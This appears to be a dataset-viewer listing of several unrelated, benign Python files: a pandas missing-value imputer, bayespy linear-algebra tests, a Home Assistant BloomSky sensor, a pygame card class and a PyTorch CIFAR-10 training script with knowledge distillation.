elif csv.__eq__('secondary_data.csv'):
data = dfimport.GetSecondaryDataFrame()
else:
raise Exception('No data set with this name could be found!')
# Current distribution, [dtype: float64]
s = data[column].value_counts(normalize=True)
missing = data[column].isnull()
data.loc[missing, column] = np.random.choice(
s.index, size=len(data[missing]), p=s.values)
res_ser = pd.Series(data[column])
return res_ser
| python |
################################################################################
# Copyright (C) 2013 Jaakko Luttinen
#
# This file is licensed under the MIT License.
################################################################################
"""
Unit tests for bayespy.utils.linalg module.
"""
import numpy as np
from .. import misc
from .. import linalg
class TestDot(misc.TestCase):
def test_dot(self):
"""
Test dot product multiple multi-dimensional arrays.
"""
# If no arrays, return 0
self.assertAllClose(linalg.dot(),
0)
# If only one array, return itself
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]]),
[[1,2,3],
[4,5,6]])
# Basic test of two arrays: (2,3) * (3,2)
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]],
[[7,8],
[9,1],
[2,3]]),
[[31,19],
[85,55]])
# Basic test of four arrays: (2,3) * (3,2) * (2,1) * (1,2)
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]],
[[7,8],
[9,1],
[2,3]],
[[4],
[5]],
[[6,7]]),
[[1314,1533],
[3690,4305]])
# Test broadcasting: (2,2,2) * (2,2,2,2)
self.assertAllClose(linalg.dot([[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[9,1],
[2,3]],
[[4,5],
[6,7]]]]),
[[[[ 7, 10],
[ 15, 22]],
[[ 67, 78],
[ 91, 106]]],
[[[ 13, 7],
[ 35, 15]],
[[ 56, 67],
[ 76, 91]]]])
# Inconsistent shapes: (2,3) * (2,3)
self.assertRaises(ValueError,
linalg.dot,
[[1,2,3],
[4,5,6]],
[[1,2,3],
[4,5,6]])
# Other axes do not broadcast: (2,2,2) * (3,2,2)
self.assertRaises(ValueError,
linalg.dot,
[[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[1,2],
[3,4]],
[[5,6],
[7,8]],
[[9,1],
[2,3]]])
# Do not broadcast matrix axes: (2,1) * (3,2)
self.assertRaises(ValueError,
linalg.dot,
[[1],
[2]],
[[1,2,3],
[4,5,6]])
# Do not accept less than 2-D arrays: (2) * (2,2)
self.assertRaises(ValueError,
linalg.dot,
[1,2],
[[1,2,3],
[4,5,6]])
class TestBandedSolve(misc.TestCase):
def test_block_banded_solve(self):
"""
Test the Gaussian elimination algorithm for block-banded matrices.
"""
#
# Create a block-banded matrix
#
# Number of blocks
N = 40
# Random sizes of the blocks
#D = np.random.randint(5, 10, size=N)
# Fixed sizes of the blocks
D = 5*np.ones(N, dtype=np.int)
# Some helpful variables to create the covariances
W = [np.random.randn(D[i], 2*D[i])
for i in range(N)]
# The diagonal blocks (covariances)
A = [np.dot(W[i], W[i].T) for i in range(N)]
# The superdiagonal blocks (cross-covariances)
B = [np.dot(W[i][:,-1:], W[i+1][:,:1].T) for i in range(N-1)]
C = misc.block_banded(A, B)
# Create the system to be solved: y=C*x
x_true = np.random.randn(np.sum(D))
y = np.dot(C, x_true)
x_true = np.reshape(x_true, (N, -1))
y = np.reshape(y, (N, -1))
#
# Run tests
#
# The correct inverse
invC = np.linalg.inv(C)
# Inverse from the function that is tested
(invA, invB, x, ldet) = linalg.block_banded_solve(np.asarray(A),
np.asarray(B),
np.asarray(y))
# Check that you get the correct number of blocks
self.assertEqual(len(invA), N)
self.assertEqual(len(invB), N-1)
# Check each block
i0 = 0
for i in range(N-1):
i1 = i0 + D[i]
i2 = i1 + D[i+1]
# Check diagonal block
self.assertTrue(np.allclose(invA[i], invC[i0:i1, i0:i1]))
# Check super-diagonal block
self.assertTrue(np.allclose(invB[i], invC[i0:i1, i1:i2]))
i0 = i1
# Check last block
self.assertTrue(np.allclose(invA[-1], invC[i0:, i0:]))
# Check the solution of the system
self.assertTrue(np.allclose(x_true, x))
# Check the log determinant
self.assertAlmostEqual(ldet/np.linalg.slogdet(C)[1], 1)
| python |
# Taken from https://github.com/ojroques/garbled-circuit
import json
# HELPER FUNCTIONS
def parse_json(json_path):
with open(json_path) as json_file:
return json.load(json_file)
| python |
"""Support the binary sensors of a BloomSky weather station."""
from __future__ import annotations
import voluptuous as vol
from homeassistant.components.binary_sensor import (
PLATFORM_SCHEMA,
BinarySensorDeviceClass,
BinarySensorEntity,
)
from homeassistant.const import CONF_MONITORED_CONDITIONS
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from . import DOMAIN
SENSOR_TYPES = {"Rain": BinarySensorDeviceClass.MOISTURE, "Night": None}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_MONITORED_CONDITIONS, default=list(SENSOR_TYPES)): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
)
}
)
def setup_platform(
hass: HomeAssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the available BloomSky weather binary sensors."""
# Default needed in case of discovery
if discovery_info is not None:
return
sensors = config[CONF_MONITORED_CONDITIONS]
bloomsky = hass.data[DOMAIN]
for device in bloomsky.devices.values():
for variable in sensors:
add_entities([BloomSkySensor(bloomsky, device, variable)], True)
class BloomSkySensor(BinarySensorEntity):
"""Representation of a single binary sensor in a BloomSky device."""
def __init__(self, bs, device, sensor_name): # pylint: disable=invalid-name
"""Initialize a BloomSky binary sensor."""
self._bloomsky = bs
self._device_id = device["DeviceID"]
self._sensor_name = sensor_name
self._attr_name = f"{device['DeviceName']} {sensor_name}"
self._attr_unique_id = f"{self._device_id}-{sensor_name}"
self._attr_device_class = SENSOR_TYPES.get(sensor_name)
def update(self):
"""Request an update from the BloomSky API."""
self._bloomsky.refresh_devices()
self._attr_is_on = self._bloomsky.devices[self._device_id]["Data"][
self._sensor_name
]
| python |
import pygame
from buttons.image_button import ImageButton
class CardComponent:
def __init__(self, screen, x, y, suit, value):
self.flipped = False
self.value = value
self.suit = suit
card_image = f"assets/{value}_{suit}.png"
self.card = ImageButton(screen, x, y, card_image, 0.5)
self.back_card = ImageButton(screen, x, y, "assets/back_red.png", 0.5)
self.hold = False
def draw(self):
if self.flipped == True:
self.back_card.draw()
else:
self.card.draw()
def flip(self):
self.flipped = not self.flipped
def getFlipped(self):
return self.flipped
def moveCard(self, x, y):
self.card.move(x, y)
def flipHold(self):
self.hold = not self.hold
def getHold(self):
return self.hold
def collides(self, pos):
return self.card.collides(pos) or self.back_card.collides(pos) | python |
import os
import time
import torch
import argparse
import torchvision
import torch.nn as nn
import torch.utils.data
import torch.optim as optim
import torchvision.transforms as transforms
from utils.function import *
from model.SE import SEresnet, loss_fn_kd
from torch.optim import lr_scheduler
from torch.utils.data import DataLoader
from torchvision.datasets import CIFAR10
best_prec1 = 0
def main(args):
global best_prec1
# CIFAR-10 Training & Test Transformation
print('. . . . . . . . . . . . . . . .PREPROCESSING DATA . . . . . . . . . . . . . . . .')
TRAIN_transform = transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
if args.cutout :
TRAIN_transform.transforms.append(Cutout(n_masks = args.n_masks, length = args.length))
VAL_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
# CIFAR-10 dataset
train_dataset = torchvision.datasets.CIFAR10(root = '../data/',
train = True,
transform = TRAIN_transform,
download = True)
val_dataset = torchvision.datasets.CIFAR10(root = '../data/',
train = False,
transform = VAL_transform,
download = True)
# Data loader
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
pin_memory = True,
drop_last = True,
batch_size = args.batch_size ,
shuffle=True)
val_loader = torch.utils.data.DataLoader(dataset=val_dataset,
pin_memory = True,
batch_size = args.batch_size ,
shuffle=False)
# Device Config
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = SEresnet()
model = model.to(device)
criterion = nn.CrossEntropyLoss().to(device)
optimizer = optim.SGD(model.parameters() , lr = args.lr , weight_decay = args.weight_decay, momentum = args.momentum)
lr_schedule = lr_scheduler.MultiStepLR(optimizer, milestones = [250,375], gamma = 0.1)
if args.evaluate :
model.load_state_dict(torch.load('./save_model/model.pt'))
model.to(device)
validation(args, val_loader, model, criterion)
# Epoch = args.Epoch
for epoch_ in range(0, args.Epoch):
print('current lr {:.5e}'.format(optimizer.param_groups[0]['lr']))
if args.KD == True:
teacher_model = SEresnet().to(device)
teacher_checkpoint = './save_model/teacher_model.pt'
load_checkpoint(teacher_checkpoint, teacher_model)
train_one_epoch_KD(args, train_loader, teacher_model, model, criterion, optimizer, epoch_)
else:
train_one_epoch(args, train_loader, model, criterion, optimizer, epoch_)
lr_schedule.step()
prec1 = validation(args, val_loader, model, criterion)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
if epoch_ > 0 and epoch_ % args.save_every == 0:
save_checkpoint({
'epoch': epoch_ + 1,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=os.path.join(args.save_dir, 'checkpoint.pt'))
save_checkpoint({
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=os.path.join(args.save_dir, 'model.pt'))
# torch.save({
# 'epoch': epoch,
# 'model_state_dict': model.state_dict(),
# 'optimizer_state_dict': optimizer.state_dict(),
# 'loss': loss,
# })
print('THE BEST MODEL prec@1 : {best_prec1:.3f} saved. '.format(best_prec1 = best_prec1))
def train_one_epoch(args, train_loader, model, criterion, optimizer, epoch_):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.train()
end = time.time()
for i, (input_, target) in enumerate(train_loader):
input_v = input_.to(device)
target = target.to(device)
target_v = target
output = model(input_v)
loss = criterion(output, target_v)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# output = output.float()
# loss = loss.float()
# measure accuracy and record loss
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update( time.time() - end )
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch_, i,len(train_loader),batch_time=batch_time,loss=losses,top1=top1))
def validation(args, val_loader, model, criterion):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.eval()
end = time.time()
with torch.no_grad():
for i, (input_, target) in enumerate(val_loader):
input_v = input_.to(device)
target = target.to(device)
target_v = target
output = model(input_v)
loss = criterion(output, target_v)
# loss = loss.float()
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1))
print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))
return top1.avg
def train_one_epoch_KD(args, train_loader, teacher_model, model, criterion, optimizer, epoch_):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.train()
teacher_model.eval()
end = time.time()
for i, (input_, target) in enumerate(train_loader):
input_ = input_.to(device)
target = target.to(device)
output_teacher = teacher_model(input_)
output = model(input_)
# loss = criterion(output, target)
loss = loss_fn_kd(output, target, output_teacher)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure accuracy and record loss
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update( time.time() - end )
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch_, i,len(train_loader),batch_time=batch_time,loss=losses,top1=top1))
| python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.